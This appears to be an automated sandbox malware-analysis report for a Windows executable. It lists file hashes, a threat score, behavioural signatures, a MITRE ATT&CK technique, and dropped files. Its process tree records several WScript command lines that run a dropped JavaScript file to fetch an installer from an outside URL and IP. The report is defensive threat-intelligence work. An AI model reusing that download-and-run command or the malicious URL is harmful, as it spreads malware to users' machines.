76fe84bb6113bc9eccbd915b15413478e620732d85417eb1f039f9002b624ccf

Analysis

max time kernel
122s
max time network
123s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
27/04/2024, 01:05

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

02105a30bdeeda1e9a755b5ccec82d2e_JaffaCakes118.exe
Size

184KB
MD5

02105a30bdeeda1e9a755b5ccec82d2e
SHA1

536605e191f5c75217df6334446059611220b200
SHA256

76fe84bb6113bc9eccbd915b15413478e620732d85417eb1f039f9002b624ccf
SHA512

096334aeeaf2254f089036861ff3ca54722f4ed4233a398295e3c7a7c77c64bdb4dc26800382948697561be4f3f62d54bc81dd94ba5f8526653cf8d24a299b85
SSDEEP

3072:/MzsU0S0w8Hp9Rc/LB+dJGESR4hIRSYaVvb1NVFJNndnO3fu:/7BSH8zUB+nGESaaRvoB7FJNndnqu

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 11 IoCs

flow	pid	Process
6	2356	WScript.exe
8	2356	WScript.exe
10	2356	WScript.exe
12	2816	WScript.exe
13	2816	WScript.exe
15	2684	WScript.exe
16	2684	WScript.exe
19	1916	WScript.exe
20	1916	WScript.exe
23	1748	WScript.exe
24	1748	WScript.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 20 IoCs

description	pid	Process	procid_target
PID 2972 wrote to memory of 2356	2972	02105a30bdeeda1e9a755b5ccec82d2e_JaffaCakes118.exe	28
PID 2972 wrote to memory of 2356	2972	02105a30bdeeda1e9a755b5ccec82d2e_JaffaCakes118.exe	28
PID 2972 wrote to memory of 2356	2972	02105a30bdeeda1e9a755b5ccec82d2e_JaffaCakes118.exe	28
PID 2972 wrote to memory of 2356	2972	02105a30bdeeda1e9a755b5ccec82d2e_JaffaCakes118.exe	28
PID 2972 wrote to memory of 2816	2972	02105a30bdeeda1e9a755b5ccec82d2e_JaffaCakes118.exe	30
PID 2972 wrote to memory of 2816	2972	02105a30bdeeda1e9a755b5ccec82d2e_JaffaCakes118.exe	30
PID 2972 wrote to memory of 2816	2972	02105a30bdeeda1e9a755b5ccec82d2e_JaffaCakes118.exe	30
PID 2972 wrote to memory of 2816	2972	02105a30bdeeda1e9a755b5ccec82d2e_JaffaCakes118.exe	30
PID 2972 wrote to memory of 2684	2972	02105a30bdeeda1e9a755b5ccec82d2e_JaffaCakes118.exe	32
PID 2972 wrote to memory of 2684	2972	02105a30bdeeda1e9a755b5ccec82d2e_JaffaCakes118.exe	32
PID 2972 wrote to memory of 2684	2972	02105a30bdeeda1e9a755b5ccec82d2e_JaffaCakes118.exe	32
PID 2972 wrote to memory of 2684	2972	02105a30bdeeda1e9a755b5ccec82d2e_JaffaCakes118.exe	32
PID 2972 wrote to memory of 1916	2972	02105a30bdeeda1e9a755b5ccec82d2e_JaffaCakes118.exe	34
PID 2972 wrote to memory of 1916	2972	02105a30bdeeda1e9a755b5ccec82d2e_JaffaCakes118.exe	34
PID 2972 wrote to memory of 1916	2972	02105a30bdeeda1e9a755b5ccec82d2e_JaffaCakes118.exe	34
PID 2972 wrote to memory of 1916	2972	02105a30bdeeda1e9a755b5ccec82d2e_JaffaCakes118.exe	34
PID 2972 wrote to memory of 1748	2972	02105a30bdeeda1e9a755b5ccec82d2e_JaffaCakes118.exe	36
PID 2972 wrote to memory of 1748	2972	02105a30bdeeda1e9a755b5ccec82d2e_JaffaCakes118.exe	36
PID 2972 wrote to memory of 1748	2972	02105a30bdeeda1e9a755b5ccec82d2e_JaffaCakes118.exe	36
PID 2972 wrote to memory of 1748	2972	02105a30bdeeda1e9a755b5ccec82d2e_JaffaCakes118.exe	36

C:\Users\Admin\AppData\Local\Temp\02105a30bdeeda1e9a755b5ccec82d2e_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\02105a30bdeeda1e9a755b5ccec82d2e_JaffaCakes118.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2972
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf1D70.js" http://www.djapp.info/?domain=EgNabrmbQp.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf1D70.exe
  2⤵
  - Blocklisted process makes network request
  PID:2356
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf1D70.js" http://www.djapp.info/?domain=EgNabrmbQp.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf1D70.exe
  2⤵
  - Blocklisted process makes network request
  PID:2816
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf1D70.js" http://www.djapp.info/?domain=EgNabrmbQp.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf1D70.exe
  2⤵
  - Blocklisted process makes network request
  PID:2684
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf1D70.js" http://www.djapp.info/?domain=EgNabrmbQp.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf1D70.exe
  2⤵
  - Blocklisted process makes network request
  PID:1916
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf1D70.js" http://www.djapp.info/?domain=EgNabrmbQp.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf1D70.exe
  2⤵
  - Blocklisted process makes network request
  PID:1748

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

Filesize
1KB

MD5
1faa26ae52cac819bc42e2ee6f6ef61f

SHA1
4a06963e3a50439e0a23dd8977e7856a1c3ae579

SHA256
bdf3acc2946bbc6cd65df5af28acb5f5155d13fe2d2f889a479c2039413c2c3b

SHA512
fb7551568671c946a3882b9435955624b01fc14fccf80c3d2554582d478aa613d9ec07b86e7f2b4f250933d5eb805bdf3c57239bc26ff854e3f243381e33a04c

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

Filesize
724B

MD5
8202a1cd02e7d69597995cabbe881a12

SHA1
8858d9d934b7aa9330ee73de6c476acf19929ff6

SHA256
58f381c3a0a0ace6321da22e40bd44a597bd98b9c9390ab9258426b5cf75a7a5

SHA512
97ba9fceab995d4bef706f8deef99e06862999734ebe6a05832c710104479c6337cbf0a76e1c1e0f91566a61334dc100d837dfd049e20da765fe49def684f9c9

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

Filesize
410B

MD5
52dbbf14bd30e7a1f7f4fc5aa0476081

SHA1
bbd9bc2b11a02b1028573065173960eabea1021a

SHA256
f547973d5321d734a6847aeb87fe73e985533e4e5c01b2fe75c5cebdb0be30cd

SHA512
9e540c3c35d9943a0f7a16048093fcfd46dd48f8f34f2f7ba4c461c71c57cab03e28bef3fcb13ed7c7cc140e54eea8bff2daa40cc9f728d92468897d25d75c3c

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
df6bf7d3303f137a7d9d4b21eb81861d

SHA1
775b1f6c72951117567d5a4ded5353c95b195d35

SHA256
0302365e293ae63598a32485c82811ee1080f1562c7235526148a563a548be1d

SHA512
05845e727e544d808510e5259d6002c15224224972af658b11e81efd4530eb6bfe49034ab37f9cd40b36e0338d5bf5a91da39e3391c7fd3d6dc8b7125d903cf1

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

Filesize
392B

MD5
8f60f54421cca7e1183a01506d31eac3

SHA1
306579c089e791d0671d511ff8bea5ec5f706bf9

SHA256
52fcdeb84a618d41f6be6923e44271515be6b8a64b92484e63b93b9a7860e37a

SHA512
b926b16d1709c0c6a44c2b3971afcb9b486b75272a091c44f964e1b0d36515da61da79bce8c50113c3dbd512131fb76f13cb661973a6bc6fdef9824fa4adf6cb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\MPR7YYBV\domain_profile[1].htm

Filesize
6KB

MD5
29903499cbd2a7ecec349de8068db681

SHA1
d44b223fab1ab37296780100079e96e6a2c80e40

SHA256
fa0a24addccb72da4ecdc31c3a85bd7a94312e2e1c193d552a0af0d21601c3b4

SHA512
52a9fe373b0511c05fc6095b98dc1376ba8ea9b86b911a0eeb96620d86d95cddeca355de919e52376b44dd75fd3550585b2707743333762b2e5c97175fa90159

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\MPR7YYBV\domain_profile[1].htm

Filesize
6KB

MD5
beb85dfce148f742d7d62bd4f3f9a637

SHA1
17aedb5a6624d8ca437b512dd970df5b789b569e

SHA256
e59c50da5310fd5514352f5c8f0f931320baa152055ae5b98ca4ae9d3df7d37b

SHA512
9fb317dfb721e7408d4f8ecabbd577572046ed74d66c044d1a299d2982329a2c3d298dd4997ef7b26d325430f4eb8f77b77c54e109bddb012057ae6cb014f72a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VIF0OH2A\domain_profile[1].htm

Filesize
40KB

MD5
e62b4e740e56f124c4038cccf3df85c1

SHA1
d29136c5989a295b278e10ad397565f3b7e88919

SHA256
2791b3db82bf3c8be92b3704482943d5d19c19025dab132dc8c5f3abb0c04ffc

SHA512
65b326113efcb8c0ea13d2fea1aaa441d1a43b6f0a13ba5a1b543e43dba53087ed55b933400be86294cb6a73632324bf8faca5e2fc7d2a1fd138340aecef493f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VIF0OH2A\domain_profile[1].htm

Filesize
40KB

MD5
78e7edc332992758e8c6d0644c7be4d1

SHA1
8dc66774dccbf5d5f63daae61c88937d9d2690c4

SHA256
1ccacb5c0b8613c3a7b01fee6d53b764d52d7ba5629e0729ac3edf61d49480c4

SHA512
01e909467facb13a7ff0b0164705c59d0cc8b882886b7918afdf4c3210ce955541bb5dd9d2e5b2db03c1acff6f4880ac1985d41e230bfb0c753e5000a20b6f02

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab4CF8.tmp

Filesize
65KB

MD5
ac05d27423a85adc1622c714f2cb6184

SHA1
b0fe2b1abddb97837ea0195be70ab2ff14d43198

SHA256
c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

SHA512
6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar6559.tmp

Filesize
171KB

MD5
9c0c641c06238516f27941aa1166d427

SHA1
64cd549fb8cf014fcd9312aa7a5b023847b6c977

SHA256
4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f

SHA512
936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06

Download Submit
C:\Users\Admin\AppData\Local\Temp\fuf1D70.js

Filesize
3KB

MD5
3813cab188d1de6f92f8b82c2059991b

SHA1
4807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb

SHA256
a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e

SHA512
83b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\MN0EERVG.txt

Filesize
175B

MD5
d396dc39bb93944d99f1609b0a44b69a

SHA1
c381976cf1511fcad9248bf7e0af21ba79a79c63

SHA256
66cc2bb8ef6d62fc297f7d39be695cb4fe989ad4bfd3966fe298e97834ab3296

SHA512
c81c3a0a4f34790716237f7bf21f0b166495215f7836e601be1c107d808dd280aa55d48c16717fc411b386c49881524f2902fac904e4a75dd62cd57684e3d4ca

Download Submit